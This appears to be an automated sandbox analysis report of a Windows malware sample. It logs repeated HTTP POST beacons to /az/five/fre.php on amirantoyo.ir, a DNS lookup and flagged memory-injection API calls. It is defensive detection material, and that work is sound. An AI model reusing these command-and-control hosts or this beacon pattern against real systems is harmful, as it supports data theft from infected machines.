Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close

Source: unknown

DNS traffic detected: queries for: andreameixueiro.com

Source: unknown

HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 190Connection: close

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown

HTTPS traffic detected: 199.195.117.165:443 -> 192.168.2.4:49772 version: TLS 1.2

System Summary:

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7423B NtWriteVirtualMemory,LoadLibraryA,	0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A783F0 NtAllocateVirtualMemory,	0_2_02A783F0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7D614 NtProtectVirtualMemory,	0_2_02A7D614
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC22 LoadLibraryA,NtSetInformationThread,	0_2_02A7DC22
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762AE NtWriteVirtualMemory,	0_2_02A762AE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7828E NtAllocateVirtualMemory,	0_2_02A7828E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77293 NtWriteVirtualMemory,	0_2_02A77293
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762F2 NtWriteVirtualMemory,	0_2_02A762F2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762C1 NtWriteVirtualMemory,	0_2_02A762C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A782DC NtAllocateVirtualMemory,	0_2_02A782DC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7623A NtWriteVirtualMemory,	0_2_02A7623A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E277 NtSetInformationThread,	0_2_02A7E277
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76B8F NtWriteVirtualMemory,	0_2_02A76B8F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76397 NtWriteVirtualMemory,	0_2_02A76397
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A773F6 NtWriteVirtualMemory,	0_2_02A773F6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A763C1 NtWriteVirtualMemory,	0_2_02A763C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77BC0 NtWriteVirtualMemory,TerminateProcess,	0_2_02A77BC0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78305 NtAllocateVirtualMemory,	0_2_02A78305
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77357 NtWriteVirtualMemory,	0_2_02A77357
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E0CB NtSetInformationThread,	0_2_02A7E0CB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A768DB NtWriteVirtualMemory,	0_2_02A768DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E016 NtSetInformationThread,	0_2_02A7E016
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77078 NtWriteVirtualMemory,	0_2_02A77078
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76843 NtWriteVirtualMemory,	0_2_02A76843
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E1BC NtSetInformationThread,	0_2_02A7E1BC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A771E7 NtWriteVirtualMemory,	0_2_02A771E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A761F4 NtWriteVirtualMemory,	0_2_02A761F4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E16C NtSetInformationThread,	0_2_02A7E16C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76976 NtWriteVirtualMemory,	0_2_02A76976
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77143 NtWriteVirtualMemory,	0_2_02A77143
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A766F7 NtWriteVirtualMemory,	0_2_02A766F7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DED7 NtSetInformationThread,	0_2_02A7DED7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76647 NtWriteVirtualMemory,	0_2_02A76647
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7D64C NtProtectVirtualMemory,	0_2_02A7D64C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DE54 NtSetInformationThread,	0_2_02A7DE54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A767EC NtWriteVirtualMemory,	0_2_02A767EC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75709 NtWriteVirtualMemory,	0_2_02A75709
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76F1F NtWriteVirtualMemory,	0_2_02A76F1F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DF5F NtSetInformationThread,	0_2_02A7DF5F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC93 NtSetInformationThread,	0_2_02A7DC93
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A764EB NtWriteVirtualMemory,	0_2_02A764EB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A784CF NtAllocateVirtualMemory,	0_2_02A784CF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DCCA NtSetInformationThread,	0_2_02A7DCCA
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78423 NtAllocateVirtualMemory,	0_2_02A78423
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC33 NtSetInformationThread,	0_2_02A7DC33
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76432 NtWriteVirtualMemory,	0_2_02A76432
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76C6A NtWriteVirtualMemory,	0_2_02A76C6A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BC75 NtWriteVirtualMemory,LoadLibraryA,	0_2_02A7BC75
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75D82 NtWriteVirtualMemory,	0_2_02A75D82
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76582 NtWriteVirtualMemory,	0_2_02A76582
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DDD3 NtSetInformationThread,	0_2_02A7DDD3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DD07 NtSetInformationThread,	0_2_02A7DD07
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77502 NtWriteVirtualMemory,	0_2_02A77502
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76D0F NtWriteVirtualMemory,	0_2_02A76D0F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7751A NtWriteVirtualMemory,	0_2_02A7751A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78577 NtAllocateVirtualMemory,	0_2_02A78577
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7A576 NtWriteVirtualMemory,	0_2_02A7A576
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DD4C NtSetInformationThread,	0_2_02A7DD4C

Detected potential crypto function

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7423B	0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A783F0	0_2_02A783F0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7100B	0_2_02A7100B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B072	0_2_02A7B072
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70919	0_2_02A70919
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77E96	0_2_02A77E96
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC22	0_2_02A7DC22
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762AE	0_2_02A762AE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7828E	0_2_02A7828E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77293	0_2_02A77293
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A742E7	0_2_02A742E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A752EE	0_2_02A752EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762F2	0_2_02A762F2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75AC1	0_2_02A75AC1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762C1	0_2_02A762C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A722D4	0_2_02A722D4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CADF	0_2_02A7CADF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78ADE	0_2_02A78ADE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A782DC	0_2_02A782DC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71AD8	0_2_02A71AD8
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72227	0_2_02A72227
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7122B	0_2_02A7122B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74A2B	0_2_02A74A2B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73232	0_2_02A73232
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78A3E	0_2_02A78A3E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7623A	0_2_02A7623A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71209	0_2_02A71209
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71275	0_2_02A71275
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CA44	0_2_02A7CA44
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7424C	0_2_02A7424C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B256	0_2_02A7B256
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71A54	0_2_02A71A54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A713BF	0_2_02A713BF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7438F	0_2_02A7438F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76B8F	0_2_02A76B8F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76397	0_2_02A76397
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73BE1	0_2_02A73BE1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7D3E0	0_2_02A7D3E0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A753EF	0_2_02A753EF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A773F6	0_2_02A773F6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A713FF	0_2_02A713FF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78BFF	0_2_02A78BFF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70BFA	0_2_02A70BFA
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A763C1	0_2_02A763C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77BC0	0_2_02A77BC0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75BCF	0_2_02A75BCF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BB25	0_2_02A7BB25
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75B23	0_2_02A75B23
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71328	0_2_02A71328
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78305	0_2_02A78305
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70B0E	0_2_02A70B0E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7A30B	0_2_02A7A30B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CB66	0_2_02A7CB66
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73B63	0_2_02A73B63
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78B6F	0_2_02A78B6F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71B6B	0_2_02A71B6B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75347	0_2_02A75347
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70B43	0_2_02A70B43
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73B57	0_2_02A73B57
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77357	0_2_02A77357
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75B52	0_2_02A75B52
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A710A6	0_2_02A710A6
